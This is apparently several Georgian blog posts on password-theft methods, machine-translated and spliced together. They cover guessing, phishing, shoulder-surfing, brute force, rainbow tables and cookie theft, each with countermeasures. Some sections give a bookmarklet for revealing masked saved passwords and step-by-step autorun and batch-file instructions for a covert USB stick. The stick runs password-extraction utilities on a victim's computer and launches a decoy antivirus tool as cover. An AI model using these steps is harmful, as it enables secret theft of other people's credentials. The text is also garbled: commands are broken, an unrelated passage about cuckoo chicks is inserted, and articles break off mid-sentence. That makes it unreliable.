კარგი დღე ყველას. წინასაახალწლო პიკისა და ზამთრის არდადეგები დასრულდა და დროა დავწეროთ რამე ბლოგზე. ამ წლის პირველი პოსტი მინდა მივუძღვნა საგანმანათლებლო პროგრამას პაროლების მოპარვის მეთოდებზე, წინა პოსტებისგან განსხვავებით: როცა „გატეხილი ხარ“, არ უნდა იჩქარო ყველა პაროლის შეცვლაზე. დაუყოვნებლივ უნდა განვმარტოთ, რომ მასალა გამიზნულია ინფორმაციული უსაფრთხოების არასპეციალისტებისთვის და მხოლოდ საინფორმაციო მიზნებისთვისაა განკუთვნილი. თუმცა, ალბათ, სპეციალისტებიც ისწავლიან რაიმე ახალს.
რაც არ უნდა სძულდეს ყველას პაროლები, ეს დღემდე რჩება იდენტიფიკაციის ყველაზე პოპულარულ საშუალებად, მაგრამ, სამწუხაროდ, ზოგჯერ მათ იპარავენ ჩვენგან. ორფაქტორიანი ავთენტიფიკაცია ნაწილობრივ ეხმარება პრობლემის მოგვარებას, მაგრამ მხოლოდ ნაწილობრივ და მხოლოდ ყველაზე კრიტიკული სერვისებისთვის.
სტატისტიკის მიხედვით, ანგარიშებზე კონტროლის დაკარგვის ყველაზე გავრცელებული მიზეზებია ორი რამ: მარტივი (ლექსიკონის) პაროლების გამოყენება და სოციალური ინჟინერია. ამ სტატიაში ვისაუბრებ პაროლების გატეხვის ძირითად მეთოდებზე, ბუნებრივია, ფართო აუდიტორიაში ამ საკითხის შესახებ ცნობიერების ამაღლების მიზნით (მასალების დესტრუქციული მიზნებისთვის გამოყენება ისჯება კანონით, ავტორი არ არის პასუხისმგებელი და ბლა ბლა ბლა ).
- გამოცნობა
დიახ, ეს ასე მარტივია. თქვენი პაროლი შეიძლება სულელურად გამოიცნოთ. გახსოვთ ჰოლივუდის ფილმების ყველა ის ეპიზოდი, როცა გმირები ვინმეს კომპიუტერს ჭრიან და პაროლად ცდილობენ მსხვერპლის შვილების, ბებია-ბაბუის, ბიძის, დეიდის სახელებს, მსხვერპლის შინაურ ცხოველებს და ა.შ. ასე რომ, ეს ნამდვილად არის ჰაკერების ერთ-ერთი ყველაზე ეფექტური მეთოდი და ეს არქაული მეთოდი მაინც ეფექტურია. ყოველივე ამის შემდეგ, ახლა ყველა აქვეყნებს უამრავ ინფორმაციას საკუთარ თავზე სოციალურ ქსელებში და თუ პაროლი ეფუძნება გარკვეულ მონაცემებს, რომლებიც დაკავშირებულია გატეხილი ანგარიშის მფლობელის ვინაობასთან, მაშინ პაროლის არჩევა დროის საკითხია (ეს არის ზუსტად მიზეზი, რის გამოც პაროლები პერიოდულად უნდა შეიცვალოს).
მეთოდის საწინააღმდეგო: ზოგადად, იმედი მაქვს, გესმით, რომ "tanyushka1990" ცუდი პაროლია, მაშინაც კი, თუ ტანიუშკა თქვენ არ ხართ, არამედ თქვენი საყვარელი შვილიშვილი. გამოიყენეთ პაროლები, რომლებიც არ არის ინტუიციურად გამოსაცნობი. პერიოდულად შეცვალეთ პაროლები (წელიწადში ერთხელ მაინც) კრიტიკული ანგარიშებისთვის მაინც.
- Სოციალური ინჟინერია
სოციალური ინჟინერია საკმაოდ ფართო ცნებაა. სოციალურ ინჟინერს შეუძლია მსხვერპლთან ურთიერთობა როგორც პირადად, ასევე ტელეფონით, მაგრამ ყველაზე ხშირად ურთიერთქმედებს ელექტრონული საკომუნიკაციო არხებით - მყისიერი მესინჯერები, სოციალური ქსელები, ელექტრონული ფოსტა. და აქ ჩვენ არ განვიხილავთ სოციალური ინჟინერიის მეთოდებს, როგორც აქ, მე მირჩევნია წაიკითხოთ ჟანრის კლასიკა - ვ. საიმონის და კ. მიტნიკის წიგნი "მოტყუების ხელოვნება". ჩვენთვის აქ მნიშვნელოვანია ის, რომ სოციალური ინჟინერიის მეთოდები პაროლების მოპარვის კუთხით მიზნად ისახავს მსხვერპლის იძულებას დათმოს პაროლი. ერთი მაგალითი ასე გამოიყურება: თავდამსხმელი წარუდგენს თავს, როგორც სისტემის ახალ ადმინისტრატორს და ეუბნება თქვენი ორგანიზაციის თანამშრომელს, რომ მას სჭირდება თანამშრომლის ელ.ფოსტის პაროლი, რათა ჩაატაროს სფერული ვაკუუმის ტესტები. კიდევ ერთი მაგალითი, როდესაც არ არის პერსონალური კონტაქტი თავდამსხმელსა და მსხვერპლს შორის: ფანი გზავნის ფიშინგის ბმულს და საგანგაშო შეტყობინებას (მაგალითად, თქვენი ანგარიში მოხსენებულია, ის დაბლოკილია და თქვენ „უნდა“ მიჰყვეთ ბმულს განბლოკეთ). ფიშინგის ბმულს მივყავართ თავდამსხმელის მიერ წინასწარ მომზადებულ გვერდზე და ერთ-ერთზე მსგავსი ზოგიერთი პოპულარული სერვისის ავტორიზაციის გვერდისკენ, მაგალითად: vk.com, gmail.com, facebook.com და ა.შ. რა მოხდება შემდეგ: მსხვერპლი, ფიქრობს, რომ ეს იურიდიული სერვისია, შეაქვს თქვენი მომხმარებლის სახელი და პაროლი, ეს საიდენტიფიკაციო მონაცემები ეგზავნება თავდამსხმელს, გამოჩნდება შეცდომის შეტყობინება (აბა, ჩვენ შორის ვის არ დაუშვია შეცდომა პაროლის შეყვანისას? ყველაფერი შეიძლება მოხდეს !) და შემდეგ მომხმარებელი გადამისამართებულია რეალურ ავტორიზაციის გვერდზე, რადგან ბინძური საქმე უკვე გაკეთებულია და მსხვერპლის ყალბ გვერდზე შენახვას აზრი არ აქვს. სხვათა შორის, თუ ვინმემ არ იცის, რატომ გთხოვს ვინდოუსი, დააჭიროთ Alt-Ctrl-Del კლავიშების კომბინაციას შესვლამდე, გირჩევთ, დაგუგლოთ და წაიკითხოთ.
მეთოდის წინააღმდეგობა: ჩვეულებრივ, საწარმოები იყენებენ ჰიბრიდულ მეთოდებს სოციალური ინჟინერიის საწინააღმდეგოდ (იმ საწარმოებში, ბუნებრივია, სადაც მათ ზოგადად აწუხებთ ინფორმაციის უსაფრთხოების საკითხები), მაგრამ თქვენ უნდა გესმოდეთ, რომ რადგან სოციალურ ინჟინერს შეუძლია მსხვერპლთან ურთიერთობა ყოველგვარი კომუნიკაციის გარეშე. არხები (და, შესაბამისად, ჩვენ ვერ შევძლებთ მისი შეტყობინებების გაფილტვრას, დაბლოკვას ან თვალყურის დევნებას), მაშინ კონტრაქციის ერთადერთი ჭეშმარიტად ეფექტური მეთოდია თანამშრომლების (კარგად, ან საკუთარი თავის, თუ ვსაუბრობთ პირად უსაფრთხოებაზე) ინფორმირება. სოციალური ინჟინერიის მეთოდები. ყოველივე ამის შემდეგ, ამ დღეებში რამდენიმე ადამიანი დაეცემა ნიგერიელი პრინცის მემკვიდრეობას ან განქორწინებას: ”დედა, გაგზავნე ფული XXXX ნომერზე. მოგვიანებით აგიხსნით“, მაგრამ ეს მეთოდები ერთხელ მუშაობდა.
- ვუაიერიზმი
აქ მხოლოდ მოკლედ აღვნიშნავ ისეთ აშკარა ნივთებს, როგორიცაა პაროლები სტიკერებზე, რომლებიც დამაგრებულია მონიტორზე ან კლავიატურის ქვეშ ქაღალდზე. აქ ჯაშუშობა ასევე შეიძლება გავიგოთ, როგორც პაროლის აკრეფის პროცესის თვალთვალი. ანუ პაროლის შეყვანა სჯობს, როცა პროცესს არავინ უყურებს. არიან საინტერესო შესაძლებლობების მქონე ადამიანები. მაგალითად, ჩემმა ერთ-ერთმა მეგობარმა დადო ფსონი, რომ მიყურებდა ლეპტოპზე პაროლის შეყვანას და შემდეგ თავად გაიმეორებდა პაროლს. და მან ფაქტობრივად გაიმეორა. ძალიან გამიკვირდა, რადგან ვიცი ათი თითის შეხებით აკრეფა და შემიძლია ძალიან სწრაფად შევიყვანო პაროლი. აღმოჩნდა, რომ მეგობარს რაღაც განსაკუთრებული ფოტოგრაფიული მეხსიერება ჰქონდა. საშიში კაცი =)
ანუ, ყურება ეხმარება თავდამსხმელს სწრაფად მიიღოს მზა პაროლი და არ მიმართოს სხვა უფრო რთულ ან რესურსზე ინტენსიურ ტექნიკას, რაც ქვემოთ იქნება განხილული. მაგრამ პაროლის „თვალებით“ დათვალიერება ერთადერთი გზა არ არის. მაგალითად, თუ თქვენ შეიყვანეთ თქვენი პაროლი სხვის კომპიუტერში და შემთხვევით შეინახეთ პაროლი, გამოხვედით ანგარიშიდან, მაგრამ არ გაასუფთავეთ მონაცემები, მაშინ სხვას შეუძლია არა მხოლოდ შევიდეს ანგარიშში პაროლის ცოდნის გარეშე (ეს არც ისე ცუდია. ), მაგრამ ასევე ამოიღეთ ეს პაროლი აშკარად, ამ მარტივი სკრიპტის ჩასმით ბრაუზერის მისამართის ზოლში იმ გვერდზე, სადაც არის შეყვანილი მომხმარებლის სახელი და პაროლი (ასტერიკებით შენიღბული):
javascript:(function())(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;% 20 ჯ [ჩამოშლა] თუ პაროლი გამოიყენება სხვა ანგარიშებზე, თავდამსხმელს შეუძლია მათზე წვდომაც. სწორედ ამიტომ უსაფრთხოების ექსპერტები კატეგორიულად არ გირჩევენ ერთი და იგივე პაროლის გამოყენებას სხვადასხვა ანგარიშებისთვის. საპირისპირო მეთოდი: არ შეიყვანოთ თქვენი პაროლი, როცა ვინმე თქვენს გვერდით დგას და ხელებს გიყურებს. არ შეიყვანოთ თქვენი პაროლი არასანდო მოწყობილობებზე. თუ მაინც მოგიწევთ, იზრუნეთ პაროლებისა და ქუქიების შესახებ ინფორმაციის გასუფთავებაზე. გარდა ამისა, keyloggers შეიძლება დამონტაჟდეს არასანდო მოწყობილობებზე. ჩვენ შეუფერხებლად გადავედით პაროლის ინტუიციური და თაღლითური ქურდობის ტექნიკიდან ტექნიკურზე. პირველი მათგანი არის პაროლების შერჩევა ლექსიკონების გამოყენებით. შესაძლოა, ინფორმაციული უსაფრთხოების სფეროში არასპეციალისტებსაც კი გაეგოთ ახალი ამბებიდან პაროლების დიდი გაჟონვის შესახებ საფოსტო ყუთებში სხვადასხვა საფოსტო სერვისებზე. როგორც მოგვიანებით გაირკვა, ამ გაჟონვის უმეტესობა დაკავშირებულია არა სერვისის პროვაიდერის სერვერების გატეხვასთან, არამედ ლექსიკონების გამოყენებით საფოსტო ყუთების პაროლების ბანალურ შერჩევასთან. "გატეხილი" საფოსტო ყუთების პაროლების უმეტესობა იყო ისეთი კომბინაციები, როგორიცაა "123456", "qwerty" და მსგავსი. "მასალების" განყოფილებაში მე გამოვაქვეყნე რამდენიმე ლექსიკონი პაროლებით (შეგიძლიათ თავად შეავსოთ ისინი), რომლებიც შეიძლება გამოყენებულ იქნას სხვადასხვა ინსტრუმენტებში, როგორიცაა John the Ripper ან Hydra, ან ბანალური ძიებით შეამოწმოთ არის თუ არა თქვენი პაროლი. ლექსიკონში. თუ არის, მაშინ სასწრაფოდ ვცვლით! საპირისპირო მეთოდი: რთული, არალექსიკონური პაროლების გამოყენება. მეთოდის სახელწოდება მომდინარეობს ორი ინგლისური სიტყვიდან: brute - brute და force - force. სახელიდან ინტუიციურად ირკვევა, თუ როგორ განსხვავდება ეს მეთოდი წინასგან - აქ პაროლის ყველა შესაძლო კომბინაცია უბრალოდ სცადა. მეთოდი შრომატევადია და რესურსებს მოითხოვს, რადგან ამ მეთოდით შერჩევა მოითხოვს მნიშვნელოვან გამოთვლით რესურსებს. ამიტომ თავდამსხმელები ამ მეთოდს მხოლოდ უკიდურეს შემთხვევაში მიმართავენ. მაგალითად, პაროლის ზუსტი სიგრძის ცოდნამ ან იმის ცოდნამ, რომ პაროლი ნამდვილად არ შეიცავს სპეციალურ სიმბოლოებს და ციფრებს, შეიძლება შეამციროს შერჩევის დრო. ეს ამცირებს შესაძლო კომბინაციების რაოდენობას. კონტრზომები: გრძელი, ქაოტური პაროლების გამოყენება და პაროლების პერიოდული შეცვლა. ნებისმიერს, ვისაც ბოლო წლებში რომელიმე სერვისის პაროლის აღდგენა მოუწია, უნდა შეამჩნია, რომ თუ ადრე ზოგიერთი სერვისი უბრალოდ გამოგიგზავნიდათ თქვენს პაროლს ელ. ეს იმის გამო ხდება, რომ არცერთი თავმოყვარე სერვისი არ ინახავს პაროლებს წმინდა ტექსტში. პაროლები ინახება ჰეშის სახით. მოკლედ, ჰეში არის ტექსტის (ჩვენს შემთხვევაში, პაროლის) გარდაქმნის შედეგი რაღაც შეუქცევადი მათემატიკური ფუნქციით. საერთო MD5 ალგორითმის გამოყენებით სიტყვის „პაროლის“ (ბრჭყალების გარეშე) კონვერტაციის შედეგი ასე გამოიყურება: დაახლოებით ასე ინახება ჩვენი პაროლები სერვისის პროვაიდერების მიერ და რადგან ითვლება, რომ ფუნქციები შეუქცევადია, როგორც ჩანს, თავად პროვაიდერებმა ვერ იცოდნენ ჩვენი პაროლი და გამოგვიგზავნონ მკაფიო ტექსტით. შეგიძლიათ მეტი წაიკითხოთ ჰეშირების შესახებ. Rainbow ცხრილები, უხეშად რომ ვთქვათ, საშუალებას გაძლევთ აღადგინოთ პაროლი ჰეშის გამოყენებით. სრული პროცესი, რა თქმა უნდა, ბევრად უფრო რთულია, ვიდრე ჩანს. ამიტომ, ვისაც აინტერესებს ტექნოლოგიის შესახებ მეტის გაცნობა, შეუძლია დაიწყოს ვიკიპედიის გვერდიდან. როგორც ჩანს, ცისარტყელას ცხრილების გამოყენებით შესაძლებელი იქნებოდა თითქმის ნებისმიერი პაროლის გატეხვა, მაგრამ ამას ასევე აქვს საკუთარი სირთულეები თავდამსხმელისთვის. თუ უხეში ძალა მოითხოვს დროსა და რესურსებს თავად ძიებისთვის, მაშინ ცისარტყელას ცხრილების შემთხვევაში იგივეა საჭირო სწორედ ამ ცხრილების შესაქმნელად. უფრო მეტიც, ცისარტყელას ცხრილების ნებისმიერ კომპლექტს ექნება მრავალი შეზღუდვა, ესენია: პაროლის სიგრძის ლიმიტი, სიმბოლოების ნაკრების ლიმიტი და კონკრეტული ჰეშირების ალგორითმის შეზღუდვა. ინტერნეტში საჯარო დომენში შეგიძლიათ იპოვოთ ცისარტყელას ცხრილები პაროლების ასარჩევად არაუმეტეს 6 სიმბოლოთი, რომლებიც შეიცავს ორივე რეგისტრის ინგლისური ანბანის მხოლოდ ასოებს, მაგრამ სპეციალური სიმბოლოებისა და ციფრების გარეშე. მაგრამ ახლა ფულს უფრო სერიოზული რამისთვის ითხოვენ. კონტრზომები: ჰაშების დამარილება. სამწუხაროდ, ამ ტიპის საწინააღმდეგო მოქმედება ხელმისაწვდომია მხოლოდ სერვისის ადმინისტრატორების დონეზე და არანაირად არ არის დამოკიდებული საბოლოო მომხმარებლის ქმედებებზე. ჰიბრიდული მეთოდები ნიშნავს ზემოთ მოცემული სხვადასხვა მეთოდების კომბინაციას. სინამდვილეში, "უხეში ძალის" + "პიპინგის" მეთოდების გამოყენების მაგალითი უკვე მოყვანილია ზემოთ. მაგალითად, თავდამსხმელს შეუძლია ნახოს არა მთელი პაროლი, არამედ მხოლოდ სიმბოლოები, რომლებიც ქმნიან პაროლს. ეს საშუალებას მისცემს მას უხეში ძალის დროს მიუთითოს მხოლოდ საჭირო სიმბოლოები პარამეტრებში და გამორიცხოს ყველა დანარჩენი ძიებიდან, რითაც მნიშვნელოვნად შეამცირებს შესაძლო კომბინაციების რაოდენობას. ჰიბრიდული მეთოდის კიდევ ერთი მაგალითი: აღებულია ლექსიკონის სიტყვა და მასში არსებული ასოები იცვლება სპეციალური სიმბოლოებით. მაგალითად, აიღეთ ლექსიკონის პაროლი „პაროლი“ და სცადეთ კომბინაციები „password123“, „p@ssword“, „pa$$w0rd“ და ა.შ. ჰიბრიდული მეთოდების დაპირისპირება გულისხმობს ზემოთ ჩამოთვლილი ყველა კონტრზომის გამოყენებას. რეალურიციხის დრო! შევეცადოთ გაერკვნენ, თუ როგორ შეგიძლიათ მოიპაროთ პაროლები კომპიუტერიდან, თუ მასზე წვდომა გაქვთ, მაგრამ მსხვერპლს არაფერში ეჭვი არ ეპარება. ერთი გზა არის სპეციალური ფლეშ დრაივის შექმნა კომუნალური საშუალებებით, რომლებსაც შეუძლიათ პაროლების ამოღება ბრაუზერებიდან და სხვა პროგრამებიდან, რომლებიც ინახავს პაროლებს მომხმარებლის მოხერხებულობისთვის. მოდით გადმოვწეროთ პაროლის აღდგენის უტილიტები, რომლებიც გვჭირდება: * MessenPass - აღადგენს პაროლებს ყველაზე პოპულარული მყისიერი შეტყობინებების პროგრამებისთვის: MSN Messenger, Windows Messenger (Windows XP-ში), Windows Live Messenger (Windows XP და Vista-ში), Yahoo Messenger (ვერსია 5.x/6.x), ICQ Lite 4 .x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda და GAIM; * Mail PassView - ამოიღებს შენახულ პაროლებს ელ.ფოსტის კლიენტებისგან: Outlook Express, Microsoft Outlook 2000 (მხოლოდ POP3/SMTP ანგარიშები), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group და ვებ-ზე დაფუძნებული ელ.ფოსტის ანგარიშები; * IE Passview - აჩვენებს „ვირის“ მიერ შენახულ ლოგინებს და პაროლებს; * ChromePass - აჩვენებს Google Chrom ბრაუზერის მიერ შენახულ შესვლას და პაროლებს; * PasswordFox - იღებს Firefox-ის მიერ შენახულ ყველა პაროლს; * Protected Storage PassView - აღადგენს დაცულ საცავში შენახულ ყველა პაროლს; * Dialupass - იღებს ყველა dialup/VPN სესიის პაროლს; * Network Password Recovery - აჩვენებს პაროლებს, რომლებსაც იყენებთ თქვენი ლოკალური ქსელის გაზიარებისთვის, ასევე .NET Passport/Messenger ანგარიშის პაროლებს; * PstPassword - ამოიღებს პაროლებს Outlook-ის პირადი საქაღალდის ფაილებიდან - .PST; * WirelessKeyView - აღადგენს უკაბელო ქსელის ყველა გასაღებს (WEP/WPA), რომელიც ინახება თქვენს კომპიუტერში. ასევე არსებობს პროგრამა სახელწოდებით OperaPassView, მაგრამ ის ჯერ არ უჭერს მხარს ბრძანების ხაზს. ამიტომ, ჩვენ მას არ ვაერთიანებთ ჩვენს კომპლექტში. ჩვენ ასევე გვჭირდება Hidden Start() უტილიტა. ჩვენ ასევე გადმოვწერთ მას ჩვენი კომუნალური სერვისების შენიღბვის მიზნით. ჩვენ მას გავუშვით პაროლის ამოღების ოპერაციის ბოლოს. და მხოლოდ მის ნამუშევრებს დაინახავს მსხვერპლი მის ეკრანზე. ჩვენ ვამზადებთ ფლეშ დრაივს. 1. შექმენით ორი საქაღალდე ფლეშ დრაივზე: 2. ფლეშ დრაივის საქაღალდეში:\prog\ ატვირთეთ ყველა შესრულებადი - utilities, hstart.exe, KK.exe 3. ფლეშ დრაივის ძირში შექმენით autorun.inf შემდეგი შინაარსით: 4. შექმენით სერიული ფაილი launch.bat: ექო გამორთულია თუ არ არსებობს "%programfiles%\Mozilla Firefox\" გადადით ბოლოს მოდით უფრო ახლოს მივხედოთ სურათების ფაილის ბრძანებებს: echo off - შესრულების შედეგების ჩვენების აკრძალვა CMD ფანჯარაში echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – ჩაწერეთ კომპიუტერის სახელი, მომხმარებლის სახელი, თარიღი და დრო ფაილში prog/log/_log.txt დაწყება prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – გაუშვით ChromePass.exe პროგრამა, რომელიც შესრულებისას უნდა შეინახოს პაროლები ფაილში prog/log/computername_chrom.txt იგივე სხვა კომუნალური საშუალებებისთვის. ერთადერთი შენიშვნა არის ის, რომ PasswordFox.exe-ის გაშვებამდე, ჩვენ შევამოწმებთ, რომ FF საერთოდ არის დაინსტალირებული მსხვერპლის კომპიუტერზე. უბრალოდ, თუ FF არ არის დაინსტალირებული, მაშინ PasswordFox.exe პროგრამა აჩვენებს შეცდომის შეტყობინებას. start prog/KK.exe – ჩვენ შენიღბვას ვახდენთ ჩვენი მოქმედებების გაშვებით Net-Worm.Win32.Kido ჭიის ამოსაღებად Kaspersky Lab–დან. ეს ყველაფერი - ფლეშ დრაივი მზად არის. ახლა თავდამსხმელს უბრალოდ სჭირდება ფლეშ დრაივის დაკავშირება მსხვერპლის კომპიუტერთან და ამომხტარ ფანჯარაში აირჩიეთ „კომპიუტერის ვირუსების სკანირება“, რომელიც გამოჩნდება ამ კომპიუტერზე ყველა შენახული პაროლის ამოსაღებად. "ვირუსის სკანირების" დასაბუთება საკმაოდ მარტივია, განსაკუთრებით იმ შემთხვევაში, თუ მსხვერპლი ენდობა თქვენ. როგორ ვიბრძოლოთ? 1. არ შეინახოთ პაროლები - უმჯობესია გამოიყენოთ რაიმე სახის პროგრამა, როგორიცაა Password Keeper ან eWallet. 3. კარგი ანტივირუსის ქონა აუცილებელია! მიუხედავად იმისა, რომ იგი დაიფიცებს მხოლოდ რამდენიმე ამ კომუნალურ მომსახურებას. ამ სტატიის დაწერის მიზეზი იყო სტატია ჟურნალ „ჰაკერში“. ეს სტატია დაწერილია მხოლოდ საინფორმაციო მიზნებისთვის. სხვა ადამიანების პაროლების ქურდობა იწვევს სისხლის სამართლის პასუხისმგებლობას ხელოვნების 1 ნაწილით. რუსეთის ფედერაციის სისხლის სამართლის კოდექსის 272 „კომპიუტერულ ინფორმაციაზე უკანონო წვდომა“ და ემუქრება რეალურიციხის დრო! კრიმინალები ბევრს ხმარობენ, რათა მოიპარონ მომხმარებლის პაროლები ყველა სახის ქსელის რესურსებზე - სოციალური ქსელის გვერდებზე, ონლაინ თამაშები, გადახდის სისტემები. ონლაინ პირადობის ქურდობის სტატისტიკა სავსეა საგანგაშო მაჩვენებლებით. იმისათვის, რომ არ ვიყოთ იმ მსხვერპლთა შორის, რომლებმაც დაკარგეს ანგარიშები, მოდით გადავხედოთ პაროლების მოპარვის ძირითად მეთოდებს, რომლებსაც ჰაკერები იყენებენ -, და. ამ მავნე „ტექნოლოგიების“ გაგებით, მათი ეფექტური წინააღმდეგობა შესაძლებელია პერსონალური მონაცემების უსაფრთხოებისა და კონფიდენციალურობის სათანადო დონის შენარჩუნებით. სამართლიანობისა და შურისძიების ტრიუმფი ხდება კვების პერიოდში. თეთრი ფერიების წიწილები, როდესაც ხედავენ, რომ მათი მშობლები ბუდეს მიუახლოვდნენ წვრილმანებში, იწყებენ რეკვას რაც შეიძლება ძლიერად, იგივე ტრიალით, როგორსაც ასწავლიდნენ მათ სიცოცხლის პირველ დღეებში. კანონიერი მემკვიდრეები მხოლოდ „მშობლიური მოტივის“ შემსრულებლები არიან, გუგულის წიწილებს კი არაფერი რჩებიან და მალე შიმშილით კვდებიან. ერთი შეხედვით, ეს ბუნების ნათელი სურათია, მაგრამ რამდენად ჰგავს ის ინტერნეტის ციფრული ჯუნგლების გაუთავებელ სივრცეებს: აქაც არის პაროლები; და არიან პერსონაჟები - ბოროტი და კეთილი - ჰაკერები და ჩვეულებრივი მომხმარებლები. ასე რომ, ძვირფასო მკითხველო, იმისათვის, რომ დაიცვათ თქვენი ძვირფასი ლოგინი და პაროლები ბოროტი ადამიანებისგან, რა თქმა უნდა, არ მოგიწევთ ტრილის სწავლა. მაგრამ პერსონალური მონაცემების მოპარვის მეთოდების გაცნობა ზედმეტი სულაც არ იქნება... მშვიდობა გინდა? მოემზადე ომისთვის! ამ მეთოდში თავდამსხმელის მთავარი იარაღი მომხმარებლის გულუბრყვილობა და გადაჭარბებული ცნობისმოყვარეობაა. არ არის დახვეწილი პროგრამული მეთოდები, მზაკვრული ვირუსები ან სხვა ჰაკერული ტექნოლოგიები. ბოროტმოქმედი, რომელმაც იცის მხოლოდ საფოსტო ყუთის შესვლა, შეაქვს მას სერვისის შესვლის ფორმაში. შემდეგ ის ეუბნება სისტემას, რომ დაავიწყდა პაროლი. მონიტორზე ჩნდება უსაფრთხოების შეკითხვა - მძარცველმა არ იცის ამაზე პასუხი, მაგრამ უკვე იცის მისი შინაარსი. სწორედ აქ იწყება „საინტერესო“ ნაწილი: კითხვის თემიდან გამომდინარე, ის მსხვერპლს უგზავნის „ცბიერ წერილს“, რომელშიც დაფარული სახით ცდილობს სწორი პასუხის გარკვევას. მზაკვრული შეტყობინება შეიძლება ასე გამოიყურებოდეს: „შუადღე მშვიდობისა! ჩვენ, კულინარიული საიტი ასეთი და ასეთი, ..... და ა.შ. რომელია თქვენი საყვარელი კერძი? და ეს მხოლოდ ცალკე მაგალითია. ამ სახის ხრიკებია "ინტერნეტში სეირნობა"დიდი ღვთაება . სოციალური ინჟინერიის შესახებ მეტი დავწერეთ სტატიაში. ასე რომ, წერილების კითხვისას თვალები გაახილე! ქუქიები (ინგლისური „ქუქი“ - ქუქიები) არის ფაილი სესიის მონაცემებით, რომელსაც ვებსაიტი ინახავს მომხმარებლის ბრაუზერში. ის ინახავს, ჰეშირებული სახით, შესვლას, პაროლს, ID-ს და სხვა ინფორმაციას, რომელსაც რესურსი პერიოდულად წვდება ონლაინ მუშაობის დროს. ჰაკერი, რომელმაც იცის კონკრეტული საიტის (ფორუმი, ელ.ფოსტის სერვისი, სოციალური ქსელი) დაუცველობა, წერს სპეციალურ სკრიპტს, რომელიც „ამოიღებს“ ქუქი-ფაილებს მსხვერპლის ბრაუზერიდან და უგზავნის მას. ეს "ბინძური საქმე" შეუძლებელია ანგარიშის მფლობელის მონაწილეობის გარეშე, რადგან სწორედ მან უნდა დაიწყოს მავნე სკრიპტი. ამიტომ, გაგზავნამდე კოდი შეფუთულია სპეციალურ „სატყუარაში“: სურათი, მიმზიდველი წერილი, მოთხოვნა და ა.შ. მთავარი ამოცანაა დაზარალებულმა მიჰყვეს მითითებულ ბმულს. და თუ ეს მოხდება, ჰაკერული სკრიპტი გადასცემს ქუქი-ფაილებს ბრაუზერიდან მესამე მხარის ჰოსტინგზე დაყენებულ სნაიფერში (ქსელის ტრაფიკის ჩამჭრელში). და მხოლოდ ამის შემდეგ მიმართავს მომხმარებელს, სადაც მას დაპირდნენ შეტყობინებაში - გაცნობის საიტზე, ვიდეო ჰოსტინგი, ფოტო გალერეა და ა.შ. ბუნებრივია, ანგარიშის მფლობელს ეჭვი არ ეპარება ამ მანიპულაციებზე - მოღალატე პროცედურას მხოლოდ 5 წამი სჭირდება. უხეში ძალის მქონე თავდამსხმელის ცხვირწინ დასატოვებლად, შექმენით რთული პაროლები, გამოიყენეთ. როგორ მოვიპაროთ პაროლები Windows-იდან. მოგესალმებით ყველას, დღეს თავს უფლებას მივცემ შევეხო სხვა თემას, რომელიც, მეჩვენება, ბევრისთვის საინტერესო იქნება. ჩვენ შევქმნით სპეციალურ ინსტრუმენტს, რომელიც მოგვცემს საშუალებას ვაჩვენოთ და შევინახოთ ყველა ის პაროლი, რომელიც შენახულია Windows-ში. შენი თუ სხვისი. მარტივად რომ ვთქვათ, პაროლების მოპარვა . განვავითაროთ თემა. რა ბრაუზერებს იყენებთ? რამდენია ფანჯარაში? სულელური კითხვა: იყენებ სოციალურ ქსელებს? სხვა სოციალური პროექტები? თითოეულ ჩვენგანს აქვს საკმაოდ ბევრი ასეთი რესურსი. თითოეულ მათგანს სჭირდება პაროლი, რომელიც ინახება იმავე ბრაუზერში. კომფორტულია. მაგრამ ეს არ არის უსაფრთხო და ახლა ნახავთ რატომ. არის კომუნალური საშუალებები, რომლებიც საშუალებას მოგცემთ პაროლების მოპარვა ბრაუზერებიდანნებისმიერი ზოლი ვებსაიტებისთვის. დაგავიწყდათ როუტერის პაროლი? ან ცალკე კაბელი გაქვს? არავითარი განსხვავება - პაკეტში შეტანილი პროგრამა საშუალებას მოგცემთ მოიპარეთ ინტერნეტის პაროლები. იყიდეთ Windows პატიოსნად თქვენი შრომით გამომუშავებული ფულით? შეძენილ კომპიუტერთან და ლეპტოპთან ერთად იყო დაყენებული? მაგრამ ყოველთვის, როცა ონლაინ შედიხართ, Windows ამოწმებს მონაცემთა ბაზას სამუშაოს შედეგებისთვის. ვინდოუსის უნიკალური აქტივაციის გასაღები აუთენტიფიკაციის მოთხოვნაა. ჩვენ ასევე ვისაუბრებთ იმაზე, თუ სად ინახება იგი. არსებობს პროგრამა, რომელიც საშუალებას მისცემს მოიპარეთ სისტემის გასაღებები და პაროლები. ასევე იქნება პაკეტის გასაღები. Microsoft Office… სრული ხედვით… გაქვთ ელექტრონული ფოსტის კლიენტები თქვენს კომპიუტერში? Microsoft Outlook, Filezilla, Mozilla Thunderburd? ფოსტაში შესვლისას, ფოსტის კლიენტი აგზავნის პაროლებს საფოსტო ყუთებში ფოსტის სერვერების სერვერებზე... არსებობს პროგრამა, რომელიც საშუალებას მოგცემთ საფოსტო ყუთების პაროლების მოპარვა. ახლა მე გაჩვენებთ, თუ როგორ შეგიძლიათ ამოიღოთ ყველაზე საიდუმლო ნივთები ფანჯრებიდან მაუსის რამდენიმე დაწკაპუნებით. და პაროლები თუნდაც დისტანციური პროგრამებისა და ბრაუზერებისთვის ნებისმიერი ფორმით. ჩვენ გამოვიყენებთ პროგრამებს NirSoft.დეველოპერებს აქვთ ბევრი "სასარგებლო" კომუნალური პროგრამა. ახლა განვიხილავთ მათ, ვინც დაგვეხმარება კონკრეტულ ამოცანებში. ყველა წარმოდგენილ პროგრამას აქვს პორტატული ვერსია და არ საჭიროებს ინსტალაციას. მწარმოებლის ვებსაიტზე შეგიძლიათ გადმოწეროთ რუსიფიკაციის ფაილები, თუმცა მოიპარეთ პაროლები სისტემიდან, ისინი არ არიან ძალიან მნიშვნელოვანი. Windows-დან „პაროლების მოპარვისთვის“ ჩვენ გვჭირდება: მე გარანტიას გაძლევთ, რომ გადმოწერილი ასამბლეა თავისუფალია ვირუსებისგან. თუმცა, პროგრამების მოქმედების ბუნება მსგავსია სნაიფერების მოქმედებისა. ასე რომ, ანტივირუსი მოახსენებს "პრობლემებს" მეტჯერ. დავიწყოთ მუშაობა. კომპიუტერი 76 ეს bat ფაილი შეიქმნა 